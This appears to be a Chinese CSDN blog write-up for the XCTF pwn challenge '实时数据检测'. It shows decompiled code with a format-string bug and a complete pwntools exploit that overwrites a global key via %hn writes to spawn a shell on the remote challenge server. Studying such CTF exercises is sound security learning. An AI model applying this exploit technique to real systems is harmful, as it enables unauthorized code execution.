攻防世界 pwn--实时数据检测

最新推荐文章于 2022-06-22 16:25:32 发布
最新推荐文章于 2022-06-22 16:25:32 发布
阅读量260 收藏
点赞数
分类专栏: pwn ctf 文章标签: 安全 pwn python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YANG12345_6/article/details/121633743
版权
ctf 同时被 2 个专栏收录
11 篇文章 0 订阅
订阅专栏
pwn
5 篇文章 0 订阅
订阅专栏

32位程序
保护都没有开
直接拖进ida分析

int locker()
{
  int result; // eax
  char s[520]; // [esp+0h] [ebp-208h] BYREF

  fgets(s, 512, stdin);
  imagemagic(s);                                // 含printf函数,有格式化字符串漏洞
  if ( key == 0x2223322 )                       // key在bss段,可以改写。又是小端序,要将0x2223322拆开写入。
    result = system("/bin/sh");
  else
    result = printf(format, &key, key);
  return result;
}

查看一下这里格式化字符串的位置
在这里插入图片描述
在第12个参数

要改写的key的地址:0x0804A048

exp:

from pwn import *

key_addr = 0x804A048
key = 0x2223322

#p = process('./shujujiance')
p = remote("111.200.241.244",60143)

# 小端序存储,将数据以小端序的方式写进去,每次写入两个字节,用%hn。h:匹配int16大小(两字节)的整数参数。
# 538:0x222-4*2 = 546-8。
# 12544:0x3322-4*3-538 = 13090-12-538.
payload = p32(key_addr+2) + p32(key_addr) + "%538c%12$hn" + "%12544c%13$hn"

p.sendline(payload)

p.interactive()
Y0ng.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
【BUUCTFPWN】ez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移
m0_55368674的博客
01-19 304
【BUUCTFPWN】ez_pz_hackover_2016 | shellcode 动态调试查找参数在栈空间中的偏移
攻防世界高手进阶区 ——实时数据检测
weixin_62675330的博客
02-13 1181
攻防世界高手进阶区 ——实时数据检测 1.分析文件 先checksec一下 发现啥都没有开,完全就是裸奔。 运行一下[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 运行发现就是想要把key的值改为0x2223322。 直接上ida int locker() { char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s);
[攻防世界]实时数据监测
逆向萌新的博客
06-22 245
[攻防世界]实时数据监测
PWN视角看待C函数——scanf
CoLin的pwn小屋
11-13 2999
scanf函数测试所用版本测试内容参数%d参数%u、%lld、%llu、%x、%llx、%f、%llf参数%c参数%s scanf函数是标准输入函数的一种,它的一些特性可以作为一些PWN题的利用空间。本文档记录对scanf函数的实验与分析的过程与结果。 scanf测试的重点是格式化的字符串。对于后面的参数来说,如果可以在之前修改对应于字符串的指针参数,那么可以实现任意地址写,这个不是scanf本身的特性,不做分析。 测试所用版本 gcc版本:gcc (Debian 10.3.0-12) 10.3.0,编译
攻防世界 Pwn 实时数据监测
MrTreebook的博客
12-12 571
攻防世界 Pwn 实时数据监测1.题目下载地址2.checksec3.IDA4.格式化字符串漏洞的解法5.exp 1.题目下载地址 点击下载 2.checksec 什么保护都没开,估计是很简单的题 进IDA分析一下 3.IDA int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); if ( key == 35795
攻防世界-pwn-实时数据监测
xxxsdd的博客
02-22 1086
1.ida查看代码 2.查看保护机制 什么都没有开 3.知识点 格式化字符串漏洞 例子 printf("aa%16$n") 32位程序时 会向栈地址为esp+15中的地址addr所指向的内存单元写入2 因为aa表示了两个字节所以向[addr]中 写入2 若想写入15 则可以利用 printf("a*15%16$n") or printf("15x%16$n") 来向栈地址为esp+15中的地...
攻防世界-进阶区-实时数据监测
CHAWUCIREN1的博客
12-01 2909
将35795746换成十六进制0x2223322(按H) 根据函数,只需要令key等于0x2223322即可getshell 查看一下 imagemagic()函数 存在格式化字符串漏洞 具体看wiki:https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/ 了解到一个骚操作 fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') 第一个参数表示格式化字符串...
[攻防世界 pwn]——实时数据监测
Y_peak的博客
02-27 594
[攻防世界 pwn]——实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746,就好 写个小脚本在pwndbg中看看偏移 from pwn import * p = process('./pwn') gdb.attach(p, 'b *0x080484A7') #p = remote("111.200.241.244",48715) key_addr = 0x0804A048 p
攻防世界pwn supermarket + 实时数据监测
PLpa的博客
02-13 889
supermarket 这是一个典型的堆题,菜单类型。 只开了NX保护的32位程序。 我们来分析一下程序 程序实现了增删改查,其中改可以改价格和商品的描述,我们重点看改描述,因为程序的漏洞就在这里。 首先让我们输入商品的名字,通过名字来找到商品,这里我们就可以伪造商品了。继续往下看会看到程序让我们输入描述信息的size。通过程序分析我们知道(&s2)[v1]+5是结构体中存储堆的si...
格式化字符串漏洞之大数溢出(攻防世界实时数据检测write_up)
qq_35066257的博客
04-14 627
大数溢出: 就是当你发现了格式化字符串漏洞时,想要向目标地址 写入较大的数,这样使用"%num$n"就没办法达成目标,这样就需要另外两个格式化字符。 下面以XCTF的实时数据检测为例子: 第一步用checksec查看保护,和位数: 第二步用ida查看漏洞: 发现存在格式化字符串漏洞,并且当key的值为“35795746”时渗透成功 查看key地址,由于我们需要设置key的值为3579574...
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
攻防世界 pwn--pwn-100
YANG12345_6的博客
11-28 3251
一、checksec一下 开启了NX 二、 file一下,查看文件属性 64位文件 三、执行 让用户不断输入 四、拖进ida里分析看反汇编代码 主要代码: 数组v1的大小是0x40,后面利用的read函数的size是0xC8,有栈溢出漏洞 五、在ida里没有找到可以利用的system("bin/sh)和system("cat flag") 六、原程序中没有调用system函数,在GOT和PLT表中没有随system函数的记录,只能从libc中寻找system函数 有puts和read函数,可以利用
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2191
攻防世界pwn–Mary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
网鼎杯2020-reverse---signal
YANG12345_6的博客
05-17 1000
reverse signal 第一次接触虚拟机逆向,还不太清楚虚拟机逆向的原理等等,如有错误,请指正。 拖进ida查看伪代码: main函数: qmemcpy 给v4赋值,赋值内容是unk_403040函数,再看这个函数的内容: 是这一大段数据 再看vm_operad函数:这个函数里用到了403040函数,为了方便,将这个函数称作a1函数。 vm_operad函数里都是witch-case函数 因为v10,v9.。。太难辨认了,把它们分别改成了i、j、k、m、n 看case语句: case1: 赋值,
攻防世界reverse高手进阶 ----- gametime
YANG12345_6的博客
10-19 759
gfsj ----- gametime 昨天做了一道攻防世界的题key和这个gametime,都是动态调试的题。key还稍微简单一些,gametime稍微费点时间,记录一下。 昨天晚上可能是没进入做题的状态(疯狂为自己找借口),动态调试的时候稍微有点难受,就没有做出来,今天早上改完计网的题做了二十分钟就出来了。还是要专注一点呐! 废话不多说,看题。 先运行一下题目给的程序 大致就是遇到s就按空格,遇到x按x,遇到m按m,前面都还按的挺顺畅的,后面就快了,反应不过来,按错了就直接退出。甚至玩通关了之后出现了
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值